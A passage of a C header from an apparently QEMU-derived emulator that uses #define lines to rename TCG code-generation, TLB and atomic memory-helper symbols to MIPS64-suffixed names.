tcg_gen_abs_i32 tcg_gen_abs_i32_mips64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mips64 #define tcg_gen_subi_i64 
tcg_gen_subi_i64_mips64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_mips64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_mips64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_mips64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mips64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mips64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mips64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_mips64 #define tcg_gen_div_i64 tcg_gen_div_i64_mips64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_mips64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_mips64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_mips64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mips64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mips64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mips64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mips64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mips64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mips64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mips64 #define tcg_gen_not_i64 tcg_gen_not_i64_mips64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_mips64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mips64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_mips64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_mips64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_mips64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_mips64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mips64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mips64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mips64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mips64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mips64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mips64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mips64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mips64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mips64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mips64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mips64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_mips64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mips64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mips64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_mips64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mips64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mips64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mips64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mips64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_mips64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_mips64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_mips64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_mips64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_mips64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mips64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mips64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mips64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mips64 #define tcg_gen_exit_tb tcg_gen_exit_tb_mips64 #define tcg_gen_goto_tb tcg_gen_goto_tb_mips64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mips64 #define check_exit_request check_exit_request_mips64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64 #define 
tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mips64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mips64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mips64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mips64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mips64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mips64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mips64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mips64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mips64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mips64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mips64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mips64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mips64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mips64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mips64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mips64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mips64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mips64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mips64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mips64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mips64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mips64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mips64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mips64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mips64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mips64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mips64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mips64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mips64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mips64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mips64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mips64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mips64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mips64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mips64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mips64 #define simd_desc simd_desc_mips64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mips64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mips64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mips64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mips64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mips64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mips64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mips64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mips64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mips64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_mips64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mips64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mips64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_mips64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mips64 #define tcg_gen_gvec_4 
tcg_gen_gvec_4_mips64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mips64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mips64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mips64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mips64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mips64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mips64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mips64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mips64 #define tcg_gen_gvec_not tcg_gen_gvec_not_mips64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mips64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mips64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mips64 #define tcg_gen_gvec_add tcg_gen_gvec_add_mips64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mips64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mips64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mips64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mips64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mips64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mips64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mips64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mips64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mips64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mips64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mips64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mips64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mips64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mips64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mips64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mips64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mips64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mips64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mips64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mips64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mips64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mips64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mips64 #define tcg_gen_gvec_and tcg_gen_gvec_and_mips64 #define tcg_gen_gvec_or tcg_gen_gvec_or_mips64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mips64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mips64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mips64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mips64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mips64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mips64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mips64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mips64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mips64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mips64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mips64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mips64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mips64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mips64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mips64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mips64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mips64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mips64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mips64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mips64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mips64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mips64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mips64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mips64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mips64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mips64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mips64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mips64 #define tcg_gen_gvec_bitsel 
tcg_gen_gvec_bitsel_mips64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mips64 #define vec_gen_2 vec_gen_2_mips64 #define vec_gen_3 vec_gen_3_mips64 #define vec_gen_4 vec_gen_4_mips64 #define tcg_gen_mov_vec tcg_gen_mov_vec_mips64 #define tcg_const_zeros_vec tcg_const_zeros_vec_mips64 #define tcg_const_ones_vec tcg_const_ones_vec_mips64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mips64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mips64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mips64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mips64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mips64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mips64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mips64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mips64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mips64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mips64 #define tcg_gen_ld_vec tcg_gen_ld_vec_mips64 #define tcg_gen_st_vec tcg_gen_st_vec_mips64 #define tcg_gen_stl_vec tcg_gen_stl_vec_mips64 #define tcg_gen_and_vec tcg_gen_and_vec_mips64 #define tcg_gen_or_vec tcg_gen_or_vec_mips64 #define tcg_gen_xor_vec tcg_gen_xor_vec_mips64 #define tcg_gen_andc_vec tcg_gen_andc_vec_mips64 #define tcg_gen_orc_vec tcg_gen_orc_vec_mips64 #define tcg_gen_nand_vec tcg_gen_nand_vec_mips64 #define tcg_gen_nor_vec tcg_gen_nor_vec_mips64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mips64 #define tcg_gen_not_vec tcg_gen_not_vec_mips64 #define tcg_gen_neg_vec tcg_gen_neg_vec_mips64 #define tcg_gen_abs_vec tcg_gen_abs_vec_mips64 #define tcg_gen_shli_vec tcg_gen_shli_vec_mips64 #define tcg_gen_shri_vec tcg_gen_shri_vec_mips64 #define tcg_gen_sari_vec tcg_gen_sari_vec_mips64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mips64 #define tcg_gen_add_vec tcg_gen_add_vec_mips64 #define tcg_gen_sub_vec tcg_gen_sub_vec_mips64 #define tcg_gen_mul_vec tcg_gen_mul_vec_mips64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mips64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mips64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mips64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mips64 #define tcg_gen_smin_vec tcg_gen_smin_vec_mips64 #define tcg_gen_umin_vec tcg_gen_umin_vec_mips64 #define tcg_gen_smax_vec tcg_gen_smax_vec_mips64 #define tcg_gen_umax_vec tcg_gen_umax_vec_mips64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mips64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mips64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mips64 #define tcg_gen_shls_vec tcg_gen_shls_vec_mips64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mips64 #define tcg_gen_sars_vec tcg_gen_sars_vec_mips64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mips64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mips64 #define tb_htable_lookup tb_htable_lookup_mips64 #define tb_set_jmp_target tb_set_jmp_target_mips64 #define cpu_exec cpu_exec_mips64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mips64 #define cpu_reloading_memory_map cpu_reloading_memory_map_mips64 #define cpu_loop_exit cpu_loop_exit_mips64 #define cpu_loop_exit_restore cpu_loop_exit_restore_mips64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mips64 #define tlb_init tlb_init_mips64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mips64 #define tlb_flush tlb_flush_mips64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mips64 #define tlb_flush_all_cpus tlb_flush_all_cpus_mips64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mips64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mips64 #define 
tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mips64 #define tlb_flush_page tlb_flush_page_mips64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mips64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mips64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mips64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mips64 #define tlb_protect_code tlb_protect_code_mips64 #define tlb_unprotect_code tlb_unprotect_code_mips64 #define tlb_reset_dirty tlb_reset_dirty_mips64 #define tlb_set_dirty tlb_set_dirty_mips64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mips64 #define tlb_set_page tlb_set_page_mips64 #define get_page_addr_code_hostp get_page_addr_code_hostp_mips64 #define get_page_addr_code get_page_addr_code_mips64 #define probe_access probe_access_mips64 #define tlb_vaddr_to_host tlb_vaddr_to_host_mips64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64 #define helper_le_lduw_mmu helper_le_lduw_mmu_mips64 #define helper_be_lduw_mmu helper_be_lduw_mmu_mips64 #define helper_le_ldul_mmu helper_le_ldul_mmu_mips64 #define helper_be_ldul_mmu helper_be_ldul_mmu_mips64 #define helper_le_ldq_mmu helper_le_ldq_mmu_mips64 #define helper_be_ldq_mmu helper_be_ldq_mmu_mips64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mips64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mips64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mips64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mips64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mips64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mips64 #define cpu_ldub_data_ra cpu_ldub_data_ra_mips64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mips64 #define cpu_lduw_data_ra cpu_lduw_data_ra_mips64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mips64 #define cpu_ldl_data_ra cpu_ldl_data_ra_mips64 #define cpu_ldq_data_ra cpu_ldq_data_ra_mips64 #define cpu_ldub_data cpu_ldub_data_mips64 #define cpu_ldsb_data cpu_ldsb_data_mips64 #define cpu_lduw_data cpu_lduw_data_mips64 #define cpu_ldsw_data cpu_ldsw_data_mips64 #define cpu_ldl_data cpu_ldl_data_mips64 #define cpu_ldq_data cpu_ldq_data_mips64 #define helper_ret_stb_mmu helper_ret_stb_mmu_mips64 #define helper_le_stw_mmu helper_le_stw_mmu_mips64 #define helper_be_stw_mmu helper_be_stw_mmu_mips64 #define helper_le_stl_mmu helper_le_stl_mmu_mips64 #define helper_be_stl_mmu helper_be_stl_mmu_mips64 #define helper_le_stq_mmu helper_le_stq_mmu_mips64 #define helper_be_stq_mmu helper_be_stq_mmu_mips64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mips64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mips64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mips64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mips64 #define cpu_stb_data_ra cpu_stb_data_ra_mips64 #define cpu_stw_data_ra cpu_stw_data_ra_mips64 #define cpu_stl_data_ra cpu_stl_data_ra_mips64 #define cpu_stq_data_ra cpu_stq_data_ra_mips64 #define cpu_stb_data cpu_stb_data_mips64 #define cpu_stw_data cpu_stw_data_mips64 #define cpu_stl_data cpu_stl_data_mips64 #define cpu_stq_data cpu_stq_data_mips64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mips64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mips64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mips64 #define 
helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mips64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mips64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mips64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mips64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mips64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mips64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mips64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mips64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mips64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mips64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mips64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mips64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mips64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mips64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mips64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mips64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mips64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mips64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mips64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mips64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mips64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mips64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mips64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mips64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mips64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mips64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mips64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mips64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mips64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mips64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mips64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mips64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mips64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mips64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mips64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mips64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mips64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mips64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mips64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mips64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mips64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mips64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mips64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mips64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mips64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mips64 #define 
helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mips64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mips64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mips64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mips64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mips64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mips64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mips64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mips64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mips64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mips64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mips64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mips64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mips64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mips64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mips64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mips64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mips64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mips64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mips64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mips64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mips64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mips64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mips64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mips64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mips64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mips64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mips64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mips64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mips64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mips64 #define 